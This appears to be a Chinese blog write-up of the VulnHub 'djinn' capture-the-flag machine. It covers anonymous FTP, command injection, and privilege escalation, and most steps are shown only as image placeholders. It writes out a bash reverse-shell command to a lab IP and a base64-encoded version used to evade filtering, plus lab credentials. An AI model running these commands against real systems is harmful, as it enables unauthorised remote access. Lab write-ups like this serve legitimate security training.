Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

vulnhub >_ djinn

Published on 09 Nov 2020

djinn

image-20200615205317501

image-20200615205617642

匿名登录ftp,下载所有文件

image-20200615210051865

image-20200615210237687

得到3个线索

nitu:81299
@nitish81299
1337端口有一个游戏

image-20200615210502911

连接被重置。试一下命令行

nc 192.168.43.251 1337

image-20200615210713538

需要回答1000次??看样需要一个脚本。

image-20200615210914878

看来只是随机的数学题,做1000次,脚本需要得到题面之后计算。先试试其他。

image-20200615211121579

一个http

正常测试

image-20200615211443768

image-20200615211639875

image-20200615211743505

虽然命令回显的是403页面,但显然,命令是被执行的。

bash -i >& /dev/tcp/192.168.43.66/1338 0>&1

image-20200615212120416

显然,由于一些限制,命令不能被执行,应该是限制了一些字符或命令。我们可以使用base64对命令进行编码。在注入后通过base64解码再传入bash来执行

image-20200615212734952

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjY2LzEzMzggMD4mMQo= | base64 -d | bash

image-20200615212822912

image-20200615213348492

image-20200615213425972

nitish:p4ssw0rdStr3r0n9

image-20200615213706914

image-20200615215315359

image-20200615215458236

尝试了很多命令组合,都无法让这个程序达成任何合适的状态

查阅了提示。需要看一下手册。

man /usr/bin/genie | less

image-20200615221258596

这个有点过分。。。

image-20200615221403904

image-20200615221830360

显然又是一个。

在用户目录下发现了这个python脚本的编译后的文件

image-20200615223218574

image-20200615222903612

python有一个uncompyle6可以帮助我们还原.pyc的代码https://pypi.org/project/uncompyle6/

image-20200615223745408

image-20200615224452587

image-20200615224824140

image-20200615222755918

related posts